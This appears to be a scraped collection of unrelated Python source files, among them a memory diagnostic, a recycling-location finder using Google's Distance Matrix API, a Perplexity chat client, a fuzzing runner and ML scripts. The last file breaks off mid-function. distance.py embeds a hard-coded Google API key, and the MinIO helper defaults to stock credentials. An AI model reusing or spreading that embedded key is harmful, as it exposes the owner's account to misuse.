            cluster_mode = "SNC4"
        elif value == 0x08:
            cluster_mode = "SNC2"
        elif value == 0x010:
            cluster_mode = "ALL2ALL"
        else:
            cluster_mode = "Unavailable"
        return cluster_mode
    def _memory_mode(self, value):
        # Decode the configured memory-mode flag byte.
        if value == 0x01:
            memory_mode = "Cache"
        elif value == 0x02:
            memory_mode = "Flat"
        elif value == 0x04:
            memory_mode = "Hybrid"
        else:
            memory_mode = "Unavailable"
        return memory_mode
    def _memory_MCDRAM_cache(self, value):
        # Decode how much MCDRAM is configured as cache.
        if value == 0x00:
            mem_MCDRAM_cache_info = "No MCDRAM used as Cache"
        elif value == 0x01:
            mem_MCDRAM_cache_info = "25% of MCDRAM used as Cache"
        elif value == 0x02:
            mem_MCDRAM_cache_info = "50% of MCDRAM used as Cache"
        elif value == 0x04:
            mem_MCDRAM_cache_info = "100% of MCDRAM used as Cache"
        else:
            mem_MCDRAM_cache_info = "Unavailable"
        return mem_MCDRAM_cache_info
    def get_total_memory(self, mem_type):
        """Sum the sizes (MB) of all modules of the given MemType."""
        size = 0
        for dimm in self.dimms:
            if dimm.type == mem_type:
                size += dimm.size
        return size
    def get_MCDRAM_mem(self, use):
        """Sum MCDRAM sizes (MB) for the given MCDRAMUse, cross-checking
        the Table 17 total against the Table 16 aggregate."""
        size = 0
        for dimm in self.dimms:
            if dimm.type == MemType.MCDRAM and dimm.mcdram_use == use:
                size += dimm.size
        if use == MCDRAMUse.CACHE:
            if self.mcdram_cache != size:
                sys.stdout.write("Note: MCDRAM Cache memory size '{0}'".format(self.mcdram_cache))
                sys.stdout.write(" reported in SMBIOS Table 16 is different from")
                sys.stdout.write(" the size '{0}' reported in Table 17.\n".format(size))
        elif use == MCDRAMUse.SYSTEM:
            if self.mcdram_system != size:
                sys.stdout.write("Note: MCDRAM system memory size '{0}'".format(self.mcdram_system))
                sys.stdout.write(" reported in SMBIOS Table 16 is different from")
                sys.stdout.write(" the size '{0}' reported in Table 17.\n".format(size))
        return size
    def get_freq(self, mem_type):
        """Return the lowest non-zero speed (MHz) among modules of mem_type."""
        freq = 0
        for dimm in self.dimms:
            if dimm.type == mem_type:
                if freq == 0 or dimm.speed < freq:
                    freq = dimm.speed
        return freq
    def get_voltage(self, mem_type):
        """Return the highest configured voltage (mV) among modules of mem_type."""
        voltage = 0
        for dimm in self.dimms:
            if dimm.type == mem_type:
                if voltage == 0 or dimm.conf_volt > voltage:
                    voltage = dimm.conf_volt
        return voltage
    def get_access(self, mem_type, mem_size, reserve_size=512):
        """Check read/write access to DDR or MCDRAM.

        For DDR a plain Python allocation is attempted; for MCDRAM the
        libmemkind hbw_* API is used (loaded via ldconfig lookup).
        Returns one of the MESSAGE_* strings.
        """
        access = MESSAGE_UNAVAILABLE
        try:
            stdout, stderr, return_code = run(FIND_LIBRARY_CMD.format(MEMKIND_LIBRARY))
            # NOTE(review): result of strip() is discarded; presumably the
            # splitlines() below was considered sufficient.
            stdout.strip()
            stdout = stdout.splitlines()[0]
            if return_code != 0 or not stdout:
                sys.stderr.write(
                    "Error: library '{0}' not found using 'ldconfig' command. Make sure you have the library installed and that 'ldconfig' DB is updated \n".format(
                        MEMKIND_LIBRARY))
                return access
            # ldconfig lines look like "name (flags) => /path/to/lib".
            lib_to_load = stdout.split("=>")[1].strip()
            mem_kind = ctypes.cdll.LoadLibrary(lib_to_load)
        except OSError as e:
            sys.stderr.write("OSError while loading the library: {0}\n".format(e))
            sys.stderr.write("Is library '" + MEMKIND_LIBRARY + "' correctly installed?\n")
            return access
        except Exception as e:
            sys.stderr.write("Unexpected error while loading the library '" + MEMKIND_LIBRARY + "'. Exception: " + str(e) + "\n")
            return access
        if not mem_kind:
            sys.stderr.write("Error: Library '" + MEMKIND_LIBRARY + "' was not loaded correctly\n")
            return access
        if mem_type == MemType.DIMM:
            try:
                if mem_size > 0:
                    # Exercise regular (DDR) allocations via the Python heap.
                    big_list_1 = list(range(100000))
                    big_list_2 = copy.deepcopy(big_list_1)
                    del big_list_1
                    del big_list_2
                else:
                    sys.stdout.write("Note: DDR memory size is zero. Cannot reserve DDR memory.\n")
                    return access
            except:
                sys.stderr.write("Error: Could not allocate DDR memory. Exception: " + str(sys.exc_info()[0]) + "\n")
                access = MESSAGE_NOT_RESERVED.format("DDR")
                return access
            access = MESSAGE_AVAILABLE
        elif mem_type == MemType.MCDRAM:
            if self.memory_mode == "Cache" or "100%" in self.mem_MCDRAM_cache_info:
                sys.stdout.write("Note: All MCDRAM memory is being used as Cache. Cannot reserve memory.\n")
                return access
            # reserve_size is in KB here (multiplied to bytes below).
            hbw_reserve_size = ctypes.c_size_t(reserve_size * 1024)
            hbw_available = mem_kind.hbw_check_available()
            if hbw_available == 0:
                hbw_malloc = mem_kind.hbw_malloc
                hbw_malloc.restype = ctypes.c_void_p
                hbw_mem_ptr = hbw_malloc(hbw_reserve_size)
                if hbw_mem_ptr != 0:
                    access = MESSAGE_AVAILABLE
                    hbw_free = mem_kind.hbw_free
                    hbw_free.argtypes = [ctypes.c_void_p]
                    hbw_free(hbw_mem_ptr)
                else:
                    sys.stderr.write("Error: Could not allocate MCDRAM memory, libmemkind returned NULL pointer.\n")
                    access = MESSAGE_NOT_RESERVED.format("MCDRAM")
            else:
                if (
                    self.get_total_ddr_memory() == 0 and
                    self.get_memory_mode() == "Flat" and  # When there are no DIMMs installed, the only supported Memory Mode is 'Flat'
                    self.get_sys_mcd_memory() > 0
                ):
                    sys.stdout.write("Note: There are no DDR DIMMs installed on the system.")
                    sys.stdout.write(" MCDRAM is being used as the only System Memory.")
                    sys.stdout.write(" Checking access to this memory.\n")
                    try:
                        big_list_1 = list(range(100000))
                        big_list_2 = copy.deepcopy(big_list_1)
                        del big_list_1
                        del big_list_2
                    except:
                        sys.stderr.write("Error: Could not allocate MCDRAM (as the only System Memory). Exception: " + str(sys.exc_info()[0]) + "\n")
                        access = MESSAGE_NOT_RESERVED.format("MCDRAM (as the only System Memory)")
                        return access
                    access = MESSAGE_AVAILABLE
                elif mem_size > 0:
                    sys.stderr.write("Error: MCDRAM memory size is greater than zero")
                    sys.stderr.write(" but libmemkind reported that is not available.")
                    sys.stderr.write(" Return code: {0}\n".format(hbw_available))
                    access = MESSAGE_NOT_RESERVED.format("MCDRAM")
                else:
                    access = MESSAGE_UNAVAILABLE
        else:
            access = MESSAGE_UNAVAILABLE
        return access
    def get_total_ddr_memory(self):
        """Total DDR size in MB."""
        return self.get_total_memory(MemType.DIMM)
    def get_total_mcd_memory(self):
        """Total MCDRAM size in MB."""
        return self.get_total_memory(MemType.MCDRAM)
    def get_cache_mcd_memory(self):
        """MCDRAM used as cache, in MB."""
        return self.get_MCDRAM_mem(MCDRAMUse.CACHE)
    def get_sys_mcd_memory(self):
        """MCDRAM used as system memory, in MB."""
        return self.get_MCDRAM_mem(MCDRAMUse.SYSTEM)
    def get_ddr_freq(self):
        return self.get_freq(MemType.DIMM)
    def get_mcd_freq(self):
        return self.get_freq(MemType.MCDRAM)
    def get_ddr_voltage(self):
        return self.get_voltage(MemType.DIMM)
    def get_mcd_voltage(self):
        return self.get_voltage(MemType.MCDRAM)
    def get_ddr_access(self, mem_size):
        return self.get_access(MemType.DIMM, mem_size)
    def get_mcd_access(self, mem_size):
        return self.get_access(MemType.MCDRAM, mem_size)
    def get_cluster_mode(self):
        return self.cluster_mode
    def get_memory_mode(self):
        return self.memory_mode
    def get_MCDRAM_cache_info(self):
        return self.mem_MCDRAM_cache_info
class DMIException(Exception):
    """Raised when SMBIOS/DMI table data cannot be read or is unsupported."""
class MemType:
    """Enumeration of memory module types handled by this tool."""
    UNKNOWN = 0
    DIMM = 1
    MCDRAM = 2
class MCDRAMUse:
    """Enumeration of how MCDRAM is being used."""
    UNKNOWN = 0
    SYSTEM = 1
    CACHE = 2
def print_memory_config(memory_config, memMCDRAMCache):
    """Print the Memory Configuration read from dmi-sysfs (BIOS)."""
    lines = [
        "Memory Configuration is: {0}".format(memory_config),
        "MCDRAM Configured as Cache is: {0}".format(memMCDRAMCache),
    ]
    for line in lines:
        sys.stdout.write(line)
        sys.stdout.write("\n")
def print_cluster_config(clusterConfig):
    """Print the Cluster Configuration read from dmi-sysfs (BIOS)."""
    message = "Cluster Configuration is: {0}".format(clusterConfig)
    sys.stdout.write(message)
    sys.stdout.write("\n")
def print_memory_info(mem_type, size, speed, freq, volt, access="Not Available", mcdram_cache=0, mcdram_sys=0):
    """Print a human-readable report block for one memory kind.

    A value of zero for size/speed/freq/volt is reported as
    "Not Available".  For MCDRAM the cache/system split is also shown.
    """
    def _fmt(value, unit):
        # Zero is the sentinel for "could not be determined".
        return "Not Available" if 0 == value else "{0} {1}".format(value, unit)

    mem_header = "*************** {0} Info ***************\n".format(mem_type)
    mem_footer = "{0}\n".format(("*" * len(mem_header)))
    sys.stdout.write(mem_header)
    sys.stdout.write("Total {0} Memory: {1}\n".format(mem_type, _fmt(size, "MB")))
    if mem_type == "MCDRAM":
        sys.stdout.write("    {0} Used as Cache: {1}\n".format(mem_type, "{0} MB".format(mcdram_cache)))
        sys.stdout.write("    {0} Used as System Memory: {1}\n".format(mem_type, "{0} MB".format(mcdram_sys)))
    sys.stdout.write("{0} Speed: {1}\n".format(mem_type, _fmt(speed, "GT/s")))
    # "Frecuency" spelling kept intentionally: it is part of the tool's output.
    sys.stdout.write("{0} Frecuency: {1}\n".format(mem_type, _fmt(freq, "MHz")))
    sys.stdout.write("{0} Voltage: {1}\n".format(mem_type, _fmt(volt, "V")))
    if mem_type == "MCDRAM":
        sys.stdout.write("{0} Access(R/W) (Only for MCDRAM used as System Memory): {1}\n".format(mem_type, access))
    else:
        sys.stdout.write("{0} Access(R/W): {1}\n".format(mem_type, access))
    sys.stdout.write(mem_footer)
def test_memory_info(args):
    """Collect and print the full DDR/MCDRAM memory report.

    Always returns 0; all results are written to stdout.
    """
    topology = MemoryTopology(args)
    # Memory and Cluster configurations as reported by BIOS/dmi-sysfs
    cluster_config = topology.get_cluster_mode()
    memory_config = topology.get_memory_mode()
    mem_MCDRAM_cache = topology.get_MCDRAM_cache_info()
    # DDR information
    ddr_size = topology.get_total_ddr_memory()
    ddr_freq = topology.get_ddr_freq()
    # Convert MHz to GigaTransfers
    # TODO: Make sure this conversion is correct for all the cases
    ddr_speed = float(ddr_freq) / 1000
    ddr_volt = topology.get_ddr_voltage()
    ddr_access = topology.get_ddr_access(ddr_size)
    # MCDRAM information
    mcd_size = topology.get_total_mcd_memory()
    mcd_cache = topology.get_cache_mcd_memory()
    mcd_sys = topology.get_sys_mcd_memory()
    mcd_freq = topology.get_mcd_freq()
    # Convert MHz to GigaTransfers
    # TODO: Make sure this conversion is correct for all the cases
    mcd_speed = float(mcd_freq) / 1000
    mcd_volt = topology.get_mcd_voltage()
    mcd_access = topology.get_mcd_access(mcd_size)
    sys.stdout.write("Total Memory: {0} MB\n".format(ddr_size + mcd_size))
    print_memory_config(memory_config, mem_MCDRAM_cache)
    print_cluster_config(cluster_config)
    print_memory_info("DDR", ddr_size, ddr_speed, ddr_freq, ddr_volt, ddr_access)
    print_memory_info("MCDRAM", mcd_size, mcd_speed, mcd_freq, mcd_volt, mcd_access, mcd_cache, mcd_sys)
    return 0
| antoinecarme/xeon-phi-data | intel_software/pkg_contents/sysdiag/CONTENTS/usr/share/sysdiag/diag_memory.py | diag_memory.py | py | 33,354 | python | en | code | 1 | github-code | 36 |
20306864607 | #!/usr/bin/python
'''
Filename: distance.py
Contributors: Todd Boone II, Jackson Brietzke, Jonah Woods, Andrew Zolintakis, Frank Longo, Peter Awori
Description: Enables the CanCan application to retrieve distance
information from Google's Distance Matrix API.
Modules
Imported: requests
difflib
creating_materials (created by us)
Imported By: gui.py
References: https://developers.google.com/maps/documentation/distance-matrix/intro
http://docs.python-requests.org/en/latest/api/
'''
import difflib
import sys

import requests

import creating_materials
GOOGLE_DISTANCE_API_URL = 'https://maps.googleapis.com/maps/api/distancematrix/json?'
# SECURITY NOTE(review): the API key is hard-coded and committed; it should
# be loaded from an environment variable or config file, and this key rotated.
API_KEY = 'AIzaSyC6ELq9yvgnhnmnnMhfmfPHRBQ6KVjSfMY'
# Initialize recycling locations
# Loaded once at import time; treated as read-only module state below.
recyclingLocations = creating_materials.create_locations_df()
# Map GUI category names to creating_materials material name
def categorySwitcher(category):
    """Map a GUI category name to the creating_materials material name.

    Unknown categories map to the empty string.
    """
    mapping = {
        'Aluminum': 'Scrap Metals',
        'Battery': 'Batteries',
        'Computers': 'Computers',
        'E-Cycling': 'Electronics',
        'Glass': 'Construction',
        'Mobile': 'Mobile Phones',
        'Paper': 'Household',
        'Plastic': 'Plastic',
        'Tires': 'Tires',
        'Waste': 'Construction',
    }
    return mapping.get(category, "")
# Retrieve full Google Distance Matrix API Response
def getDistanceInfo(origin, destination):
    """Query the Google Distance Matrix API for origin -> destination.

    Parameters:
        origin - starting point for calculating travel distance and time
        destination - finishing point(s); multiple addresses separated by '|'

    Returns the decoded JSON response.  Exits the process if the HTTP
    request itself fails.
    """
    params = {
        'origins': origin,
        'destinations': destination,
        'units': 'imperial',  # report distances in miles
        'key': API_KEY
    }
    # Make the API request and store response, else print error and exit
    try:
        response = requests.get(GOOGLE_DISTANCE_API_URL, params=params)
        distanceResponse = response.json()
    except requests.exceptions.RequestException as e:
        print(e)
        # Fix: this path previously raised NameError because `sys` was
        # never imported at module level (now added to the imports).
        sys.exit(1)
    return distanceResponse
# Retrieve the list of destination addresses
def getAddress(distanceResponse):
    """Extract the list of resolved destination addresses from a Distance
    Matrix API response.

    Returns an error string instead of a list when the API reported
    ZERO_RESULTS (callers check for this); otherwise returns the
    (possibly empty) list of addresses.
    """
    address = []
    try:
        for currentAddress in distanceResponse['destination_addresses']:
            address.append(currentAddress)
    # Fix: narrowed from a bare `except:` that swallowed everything,
    # including KeyboardInterrupt.
    except (KeyError, TypeError, AttributeError):
        # Fix: .get() avoids a second KeyError when 'status' is absent.
        if distanceResponse.get('status') == 'ZERO_RESULTS':
            error = 'The distance could not be calculated. Try a different address.'
            return error
    return address
# Retrieve the list of miles in between origin and destination
def getMiles(distanceResponse):
    """Extract the human-readable distance ("x mi") for each destination.

    Returns an error string when the API reported ZERO_RESULTS for the
    first element; otherwise a (possibly empty) list of distance strings.
    """
    distance = []
    try:
        for element in distanceResponse['rows'][0]['elements']:
            text = element['distance'].get('text')
            if text is not None:
                distance.append(text)
    # Fix: narrowed from a bare `except:`.
    except (KeyError, IndexError, TypeError, AttributeError):
        # Fix: guard the status lookup — it previously used chained
        # bracket access that could itself raise inside the handler.
        try:
            status = distanceResponse['rows'][0]['elements'][0]['status']
        except (KeyError, IndexError, TypeError):
            status = None
        if status == 'ZERO_RESULTS':
            error = 'The miles could not be calculated. Try a different address.'
            return error
    return distance
# Retrieve the list of duration times in between origin and destination
def getDuration(distanceResponse):
    """Extract the human-readable travel time for each destination.

    Returns an error string when the API reported ZERO_RESULTS for the
    first element; otherwise a (possibly empty) list of duration strings.
    """
    duration = []
    try:
        for element in distanceResponse['rows'][0]['elements']:
            text = element['duration'].get('text')
            if text is not None:
                duration.append(text)
    # Fix: narrowed from a bare `except:`.
    except (KeyError, IndexError, TypeError, AttributeError):
        # Fix: guard the status lookup against missing keys/empty lists.
        try:
            status = distanceResponse['rows'][0]['elements'][0]['status']
        except (KeyError, IndexError, TypeError):
            status = None
        if status == 'ZERO_RESULTS':
            error = 'The duration could not be calculated. Try a different address.'
            return error
    return duration
# Retrieve the list of duration values in between origin and destination
def getDurationValue(distanceResponse):
    """Extract the numeric travel time (seconds) for each destination.

    Returns an error string when the API reported ZERO_RESULTS for the
    first element; otherwise a (possibly empty) list of integers.
    """
    durationValue = []
    try:
        for element in distanceResponse['rows'][0]['elements']:
            value = element['duration'].get('value')
            if value is not None:
                durationValue.append(value)
    # Fix: narrowed from a bare `except:`.
    except (KeyError, IndexError, TypeError, AttributeError):
        # Fix: guard the status lookup against missing keys/empty lists.
        try:
            status = distanceResponse['rows'][0]['elements'][0]['status']
        except (KeyError, IndexError, TypeError):
            status = None
        if status == 'ZERO_RESULTS':
            error = 'The duration value could not be calculated. Try a different address.'
            return error
    return durationValue
# Get a dictionary of closest location
def getClosestLocation(origin, destination):
    """Return a dict describing the destination reachable fastest from origin.

    The returned dict has keys 'address', 'miles' and 'duration'.
    """
    response = getDistanceInfo(origin, destination)
    # Parallel lists: one entry per candidate destination
    address = getAddress(response)
    miles = getMiles(response)
    duration = getDuration(response)
    durationValue = getDurationValue(response)
    # The candidate with the smallest travel time wins
    closestIndex = durationValue.index(min(durationValue))
    return {
        'address': address[closestIndex],
        'miles': miles[closestIndex],
        'duration': duration[closestIndex]
    }
# Get a full dictionary that represents closest info to display on application
def getClosestAppropriateLocation(origin='Heinz College', material = ''):
    """Find the closest recycling facility that accepts `material`.

    Returns a dict with keys 'address', 'miles', 'duration' and (when a
    fuzzy address match succeeds) 'name'.
    """
    # Translate the GUI category into the creating_materials material name
    material = categorySwitcher(material)
    # All facilities that can accept this material
    appropriateLocations = creating_materials.find_locations_that_accept_material(recyclingLocations, material)
    listOfAddresses = [place['location_address'] for place in appropriateLocations]
    # The Distance Matrix API expects destinations separated by '|'
    formattedListOfAddresses = "|".join(listOfAddresses)
    # Dict with keys 'address', 'miles', 'duration'
    closestAppropriateLocationDict = getClosestLocation(origin, formattedListOfAddresses)
    # Attach the facility name matching the chosen address; fuzzy match is
    # needed because Google normalizes address formatting.
    for place in appropriateLocations:
        if place['location_address'] == difflib.get_close_matches(closestAppropriateLocationDict['address'], listOfAddresses)[0]:
            closestAppropriateLocationDict['name'] = place['location_name']
    return closestAppropriateLocationDict
if __name__ == "__main__":
    '''
    Testing getClosestAppropriateLocation() functionality
    '''
    print("Enter an address. We will find the closest facility to you that can accept Batteries.\n")
    origin = input('Enter an origin address: ')
    # NOTE(review): "Batteries" is the creating_materials name, not a GUI
    # category key — categorySwitcher() maps it to "". Confirm whether
    # "Battery" was intended here.
    material = "Batteries"
    closestAppropriateLocationDict = getClosestAppropriateLocation(origin, material)
    print("Name: " + str(closestAppropriateLocationDict.get('name')))
    print("Address: " + str(closestAppropriateLocationDict.get('address')))
    print("Miles: " + str(closestAppropriateLocationDict.get('miles')))
    print("Duration: " + str(closestAppropriateLocationDict.get('duration')))
    # End Testing getClosestAppropriateLocation() functionality
| toddbooneii/cancan | distance.py | distance.py | py | 6,739 | python | en | code | 0 | github-code | 36 |
22340501918 | import os
import json
import requests
import sys
import readline
# Constants
URL = "https://api.perplexity.ai/chat/completions"
HEADERS = {
    "accept": "text/event-stream",  # request Server-Sent Events streaming
    "content-type": "application/json",
    # API key must be supplied via the PERPLEXITY_API_KEY environment variable
    "authorization": f"Bearer {os.getenv('PERPLEXITY_API_KEY')}"
}
def get_input(prompt):
    """Prompt the user and return the entered line, or None on EOF.

    `readline` is imported at module level so line editing works on a TTY.
    """
    try:
        line = input(prompt)
    except EOFError:
        return None
    return line
def stream_request(messages):
    """POST `messages` to the Perplexity chat API and stream the reply to stdout.

    Raises requests.HTTPError on a non-2xx response (via raise_for_status).
    """
    last_printed = ""  # Variable to keep track of the last printed message
    payload = {
        "model": "pplx-70b-chat-alpha",
        "messages": messages,
        "stream": True
    }
    with requests.post(URL, headers=HEADERS, json=payload, stream=True) as response:
        response.raise_for_status()
        sys.stdout.write("Assistant: ")
        for line in response.iter_lines():
            if line:
                # SSE events are prefixed with "data: "; strip it before parsing.
                decoded_line = line.decode('utf-8').replace('data: ', '')
                try:
                    data = json.loads(decoded_line)
                    # NOTE(review): assumes each event carries the full
                    # cumulative content so far, so only the new suffix is
                    # printed — confirm against the API's streaming format.
                    current_content = data['choices'][0]['message']['content']
                    if current_content != last_printed:  # Update only if there is new content
                        new_content = current_content[len(last_printed):]
                        if new_content:  # Only update if new content is not empty
                            sys.stdout.write(new_content)
                            sys.stdout.flush()  # Flush the buffer to immediately print the new content
                            last_printed = current_content
                # Non-JSON keep-alive/terminator lines are skipped silently.
                except json.JSONDecodeError:
                    continue
    print()  # Print a new line after full response is received
def main():
    """Run the interactive chat loop: read a prompt, stream the reply, repeat."""
    print("Perplexity Chat Bot")
    print("-------------------")
    print("Type 'exit' to end the chat.")
    while True:
        line = get_input("You: ")
        # EOF (Ctrl-D) or an explicit 'exit' ends the session.
        if line is None or line.lower().strip() == 'exit':
            print("Goodbye!")
            return
        stream_request([
            {
                "role": "system",
                "content": "Be precise and concise."
            },
            {
                "role": "user",
                "content": line
            },
        ])


if __name__ == "__main__":
    main()
| piercecohen1/pplx-api-streaming | pplxchat.py | pplxchat.py | py | 2,331 | python | en | code | 0 | github-code | 36 |
44145537078 | import time
import copy
import os
from integrate_all_commits_libs import current_libs
from ExperimentRunner import Logger, save_leftover_libs, init_directory, ExpRunner
RUN_NAME = "test_run_1"
SAVE_DIRECTORY = f"/home/forian/uni/{RUN_NAME}"  # results + logs go here
FUZZBENCH_DIRECTORY = "/home/forian/uni/fuzzbench"  # local fuzzbench checkout
TEST_RUN_TIMEOUT = 300  # seconds a single experiment has for building
DEBUG = False  # whether logged errors should also be printed
OSS_LIBRARIES = current_libs  # OSS libraries/experiments to run
# The libraries should have the format: {'project': [ ([fuzz_targets], commit1, date1), ... ]}
def main() -> int:
    """Run one build experiment per (project, commit, fuzz target).

    Returns 1 when there is nothing to do, 0 otherwise.  Progress and
    counters are written through the Logger; leftover (unprocessed)
    libraries are persisted after each project so a crash can resume.
    """
    # create directory, if they don't already exist
    init_directory(SAVE_DIRECTORY)
    # define logger and Experiment runner
    logger = Logger(save_directory=os.path.join(SAVE_DIRECTORY, 'log'), debug=DEBUG)
    exp_runner = ExpRunner(test_run_timeout=TEST_RUN_TIMEOUT, fuzzbench_path=FUZZBENCH_DIRECTORY,
                           save_path=SAVE_DIRECTORY, logger=logger)
    # copy libraries, so they don't interfere with the loop items
    oss_libraries = copy.deepcopy(OSS_LIBRARIES)
    if not oss_libraries:
        logger.log("I'm done ... There are no experiments left to integrate and test.")
        return 1
    exception_counter = 0
    timeout_counter = 0
    system_pruned = True
    n = 0
    # start of the main loop
    for project, values in OSS_LIBRARIES.items():
        for (fuzz_target_list, commit_hash, date) in values:
            for fuzz_target in fuzz_target_list:
                n += 1
                experiment_name = f'{project}__{fuzz_target}__{commit_hash}__{date}'
                logger.log(f'\n\n{n}. running {experiment_name}')
                logger.log(f'{time.ctime()}')
                # if the system has been pruned give more time, since the base image needs to be reinstalled
                if system_pruned:
                    res = exp_runner.run_experiment(project, fuzz_target, commit_hash, date,
                                                    timeout=2 * TEST_RUN_TIMEOUT, cleanup=True)
                    system_pruned = False
                else:
                    res = exp_runner.run_experiment(project, fuzz_target, commit_hash, date, cleanup=True)
                # NOTE(review): a truthy result is counted as a timeout,
                # falsy as an exception — confirm against ExpRunner's contract.
                if res:
                    timeout_counter += 1
                else:
                    exception_counter += 1
                # every x-th run prune the system
                # if n % 25 == 0:
                #     p1 = run('docker system prune -f')
                #     log(DEBUG, str(p1.stdout.decode()))
                #     system_pruned = True
                # NOTE(review): this break only exits the fuzz_target loop;
                # the commit and project loops keep running past 25.
                if n > 25:
                    break
        # pop the experiment from the list and save all libraries still to do (in case of crash)
        oss_libraries.pop(project)
        save_leftover_libs('integrate_all_commits_libs.py', oss_libraries)
    logger.log("------------------------------------------ Finished ------------------------------------------")
    logger.log(f"Exception counter: {exception_counter}")
    logger.log(f"Timeout counter: {timeout_counter}")
    logger.log(f"Total counter: {n}")
    return 0
if __name__ == "__main__":
    print("Starting the experiment ...")
    # Propagate main()'s result as the process exit code.
    x = main()
    exit(x)
| ninjafail/format_fuzzer_experiments | integrate_all/integrate_all_commits.py | integrate_all_commits.py | py | 3,261 | python | en | code | 1 | github-code | 36 |
73685012263 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.preprocessing import StandardScaler,PolynomialFeatures
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder, Binarizer
from sklearn import linear_model
from sklearn.metrics import mean_squared_error,r2_score
# --- Load and preprocess the training data -------------------------------
train = pd.read_csv('train_NIR5Yl1.csv')
train.head()
train.drop(['ID','Username'],axis=1,inplace=True)
# Binary feature: 1 when a question has more than 5 answers.
bn = Binarizer(threshold=5)
pd_watched = bn.transform([train['Answers']])[0]
train['pd_watched'] = pd_watched
le = LabelEncoder()
train['Tag'] = le.fit_transform(train['Tag'])
print(train.head())
X=train.drop('Upvotes',axis=1)
y=train['Upvotes']
std=StandardScaler()
X_scaled=pd.DataFrame(std.fit_transform(X),columns=X.columns,index=X.index)
# --- Train/validation split ----------------------------------------------
ts = 0.24
rs = 205
X_train, X_val, y_train, y_val = train_test_split(X_scaled, y, test_size=ts, random_state=rs)
print(X_train.head())
print(X_val.head())
# --- Degree-4 polynomial features + LassoLars regression ------------------
poly_reg=PolynomialFeatures(degree=4,include_bias=True,interaction_only=False)
X_poly_train = poly_reg.fit_transform(X_train)
X_poly_train = pd.DataFrame(X_poly_train)
X_poly_val = poly_reg.fit_transform(X_val)
X_poly_val = pd.DataFrame(X_poly_val)
alp = 0.027
lin_reg_1 = linear_model.LassoLars(alpha=alp,max_iter=150)
lin_reg_1.fit(X_poly_train,y_train)
pred_train = lin_reg_1.predict(X_poly_train)
print('Train R2:',r2_score(y_train, pred_train))
print('Train RMSE:',np.sqrt(mean_squared_error(y_train, pred_train)))
pred_val = lin_reg_1.predict(X_poly_val)
print('Val R2:',r2_score(y_val, pred_val))
print('Val RMSE:',np.sqrt(mean_squared_error(y_val, pred_val)))
# --- Score the competition test set and write the submission --------------
test = pd.read_csv('test_8i3B3FC.csv')
ID = test['ID']
test.drop(['ID','Username'],axis=1,inplace=True)
# NOTE(review): fit_transform here refits the label encoder on the test
# tags, so labels may map differently than in training — transform() with
# the training-fitted encoder is presumably intended.
test['Tag'] = le.fit_transform(test['Tag'])
pd_watched = bn.transform([test['Answers']])[0]
test['pd_watched'] = pd_watched
# NOTE(review): likewise, refitting the scaler on the test set leaks
# test statistics; std.transform(test) would reuse the training scaling.
test_scaled=pd.DataFrame(std.fit_transform(test),columns=test.columns,index=test.index)
test_poly = poly_reg.fit_transform(test_scaled)
test_poly = pd.DataFrame(test_poly)
test_pred = lin_reg_1.predict(test_poly)
# Upvote counts cannot be negative.
test_pred = abs(test_pred)
ans = pd.DataFrame({'ID' : ID, 'Upvotes' : test_pred})
sub = ans.sort_values(by=['ID'])
print(sub)
file_name = '5-lasso__ts_{}__rs_{}__alpha_{}.csv'.format(ts,rs,alp)
sub.to_csv(file_name, index=False)
| smittal1995/Upvote-count | lasso.py | lasso.py | py | 2,390 | python | en | code | 0 | github-code | 36 |
37218399811 | from os import getenv
from minio import Minio
def get_s3_client():
    """Build a Minio client from MINIO_* environment variables.

    Defaults to a local minioadmin instance; TLS is disabled.
    """
    host = getenv("MINIO_HOST", "127.0.0.1")
    port = getenv("MINIO_PORT", "9000")
    return Minio(
        "{host}:{port}".format(host=host, port=port),
        getenv("MINIO_ACCESS_KEY", "minioadmin"),
        getenv("MINIO_SECRET_KEY", "minioadmin"),
        secure=False
    )
| parledoct/qbestdocks | src/common/resources/s3.py | s3.py | py | 441 | python | en | code | 0 | github-code | 36 |
# Daisy-24 LCD demo: print a greeting, then cycle the contrast up and down forever.
import ablib
import time
#Check for Daisy-24 address (0x27 on some boards, 0x3F on others)
if ablib.existI2Cdevice(0,0x27):
    i2c_address=0x27
else:
    i2c_address=0x3F
lcd = ablib.Daisy24(0,i2c_address)
lcd.backlighton()
lcd.putstring("Hello World !")
# Sweep contrast 0->10->0 repeatedly, one step every 100 ms.
while True:
    i=0
    while i<10:
        i+=1
        lcd.setcontrast(i)
        time.sleep(0.1)
    while i>0:
        i-=1
        lcd.setcontrast(i)
        time.sleep(0.1)
| tanzilli/playground | python/daisy24/contrast.py | contrast.py | py | 355 | python | en | code | 58 | github-code | 36 |
16748045789 | import os
import pickle
from pathlib import Path
import numpy as np
import pandas as pd
import sklearn
import xgboost as xgb
class CapacityPredictionModel:
    """Multi-class capacity classifier backed by an XGBoost gradient-boosted tree model."""

    def __init__(self, classes=None, hyper_params=None):
        """Create the classifier.

        Args:
            classes: definition of the classification classes (stored verbatim).
            hyper_params: optional dict of XGBoost parameters; defaults are
                used when omitted.
        """
        if hyper_params is None:
            hyper_params = {
                "objective": "multi:softprob",
                "learning_rate": 0.01,
                # Bug fix: key was misspelled "col_sample_bytree";
                # XGBoost's parameter is "colsample_bytree".
                "colsample_bytree": 0.85,
                "max_depth": 3,
                "n_estimators": 256,
                "verbosity": 0,
            }
        # Bug fix: when hyper_params was supplied, self.hyper_params was never
        # assigned, causing an AttributeError below; always store it.
        self.hyper_params = hyper_params
        # definition of classification classes
        self.classes = classes
        # Bug fix: XGBClassifier(kwargs=dict) passed ONE literal parameter
        # named "kwargs" and silently ignored every hyper-parameter; the
        # dict must be unpacked with **.
        self.model = xgb.XGBClassifier(**self.hyper_params)

    def train(self, train_x, train_y, val_x, val_y):
        """Fit the model, tracking loss on both the train and validation sets."""
        self.model.fit(
            train_x,
            train_y,
            eval_set=[(train_x, train_y), (val_x, val_y)],
            verbose=False,
        )

    def predict(self, x):
        """Predict labels and class probabilities for *x*.

        Returns:
            (y_pred, y_pred_prob): labels as a Series and per-class
            probabilities as a DataFrame, both indexed like *x*.
        """
        # best iteration = lowest validation mlogloss seen during train()
        best_iter = int(
            np.argmin(self.model.evals_result()["validation_1"]["mlogloss"])
        )
        # predict classes
        # NOTE: ntree_limit is deprecated in xgboost >= 1.6; migrate to
        # iteration_range=(0, best_iter) when the dependency is upgraded.
        y_pred = self.model.predict(x, ntree_limit=best_iter)
        y_pred = pd.DataFrame(y_pred.flatten(), index=x.index)[0]
        # predict probabilities
